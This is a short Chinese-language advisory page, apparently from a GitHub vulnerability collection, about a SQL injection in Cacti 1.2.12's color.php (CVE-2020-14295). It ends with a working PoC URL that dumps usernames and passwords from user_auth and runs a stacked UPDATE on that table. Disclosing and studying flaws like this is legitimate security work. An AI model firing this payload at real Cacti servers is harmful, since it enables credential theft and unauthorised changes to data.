Skip to content

Latest commit

 

History

History
16 lines (9 loc) · 562 Bytes

Cacti SQL 注入漏洞(CVE-2020-14295).md

File metadata and controls

16 lines (9 loc) · 562 Bytes

Cacti SQL 注入漏洞(CVE-2020-14295)

Cacti 1.2.12 中 color.php 中存在 SQL注入漏洞,允许具有管理员权限的攻击者通过 filter 参数注入 SQL。因为产品接受堆积的查询,所以这可能导致远程命令执行。目前该漏洞 EXP 已公开。

影响版本:

Cacti < 1.2.13

详情可以参考:Cacti/cacti#3622

PoC:

/cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+user_auth+set+username='sqli'+where+id=3;--+-